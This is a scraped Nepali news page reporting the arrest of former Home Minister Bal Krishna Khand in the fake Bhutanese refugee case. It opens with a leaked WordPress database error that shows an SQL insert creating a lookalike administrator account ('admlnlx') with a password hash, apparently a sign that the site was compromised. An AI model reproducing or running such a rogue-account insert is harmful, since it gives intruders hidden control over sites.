WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPb/eOgNJYycLN0.txR5F7zDwTyrkp1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:34:07', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेपाली कांग्रेसका नेता एवम् पूर्व गृहमन्त्री बालकृष्ण खाँण पक्राउ परेका छन् ।
नक्कली भुटानी शरणार्थी प्रकरणमा मुछिएका खाँणलाई प्रहरीले (आज) बुधबार बिहान आफ्नै निवासबाटै पक्राउ गरेको कांग्रेसका एक नेताले जानकारी दिए । यही प्रकरणमा मुछिएका पूर्व उपप्रधानमन्त्री एवम् नेकपा एमालेका सचिव टोपबहादुर रायमाझी भने फरार छन् ।